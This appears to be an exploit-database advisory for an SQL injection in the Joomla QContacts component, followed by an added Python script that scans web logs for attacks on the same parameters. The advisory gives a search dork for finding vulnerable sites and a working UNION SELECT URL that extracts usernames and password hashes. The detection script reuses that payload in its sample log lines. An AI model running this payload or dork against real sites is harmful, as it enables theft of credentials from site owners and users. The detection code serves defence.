ID 1337DAY-ID-13320
Type zdt
Reporter _mlk_
Modified 2010-07-13T00:00:00
Description
Exploit for php platform in category web applications
==========================================================
Joomla Component com_qcontacts SQL Injection Vulnerability
==========================================================
# Exploit Title: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability
# Date: 12, July 2010
# Author: _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip
# Version: 1.0.4 and previous
# Tested on: all OS
# CVE : 0
# Code : here
Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability
#################################################################################################################
[+] Discovered by : _mlk_ (Renan)
[+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
[+] Homepages : http://code.google.com/p/bugsec/
http://botecounix.com.br/blog/
http://c0d3rs.wordpress.com/
[+] Location : Porto Alegre - RS, Brasil
(or Brazil)
#################################################################################################################
[-] Information
[?] Script : QContacts
[?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html
[?] Versions Tested: 1.0.4 and previous
[?] Dork/String : "index.php?option=com_qcontacts" / "com_qcontacts"
[?] Date : 12, July 2010
-----------------------------------------------------------------------------------------------------------------
[*] Vulnerable parameters :
Itemid
id
catid
-----------------------------------------------------------------------------------------------------------------
[*] Example :
http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
-----------------------------------------------------------------------------------------------------------------
[*] Demo :
http://<server>/path/index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541
+union+select+concat(id,0x3a,name,0x3a,username,0x3a,password)+from+cms01_users--
#################################################################################################################
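Added example, not part of the original advisory: a log check for the three parameters listed above, which flags com_qcontacts requests whose Itemid, id or catid is not a plain integer. The combined access-log format, the accepted "id:alias" slug form and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as injectable; all are numeric ids in normal use.
NUMERIC_PARAMS = ("Itemid", "id", "catid")
# Assumption: a legitimate value is an optional sign plus digits, optionally
# followed by a Joomla-style ":alias" slug.
VALID_VALUE = re.compile(r"-?[0-9]+(:[\w-]+)?")
# Assumption: Apache/nginx "combined" log format with a quoted request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; line 3 reuses the demo request from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jul/2010:10:00:00 +0000] "GET /index.php?option=com_qcontacts'
    '&view=contact&id=1&Itemid=54 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Jul/2010:10:00:05 +0000] "GET /index.php?option=com_content'
    '&id=abc HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Jul/2010:10:01:00 +0000] "GET /index.php?option=com_qcontacts'
    '&view=contact&id=1&Itemid=-541+union+select+concat(id,0x3a,name,0x3a,username,'
    '0x3a,password)+from+cms01_users-- HTTP/1.1" 200 9034',
    '192.0.2.10 - - [12/Jul/2010:10:02:00 +0000] "GET /index.php?option=com_qcontacts'
    '&id=7:sales-team&catid=3 HTTP/1.1" 200 4410',
]

def suspicious_params(request_target):
    """Return {param: value} for com_qcontacts requests with non-numeric ids."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "com_qcontacts" not in query.get("option", []):
        return {}  # other components are out of scope for this check
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):  # parse_qs has already URL-decoded
            if not VALID_VALUE.fullmatch(value):
                bad[name] = value
    return bad

def scan(log_lines):
    """Yield (line_number, findings) for each log line that needs review."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        findings = suspicious_params(match.group(1)) if match else {}
        if findings:
            yield number, findings

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```

A hit marks a request to review, not proof of compromise; parameters sent in POST bodies do not appear in access logs and are not covered by this check.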
[~] Acknowledgements :
God , family , friends and Tricolor Gaúcho (Grêmio) .
Special thanks to "i4k" ( alien \o/ ) .
#################################################################################################################
# 0day.today [2018-04-04] #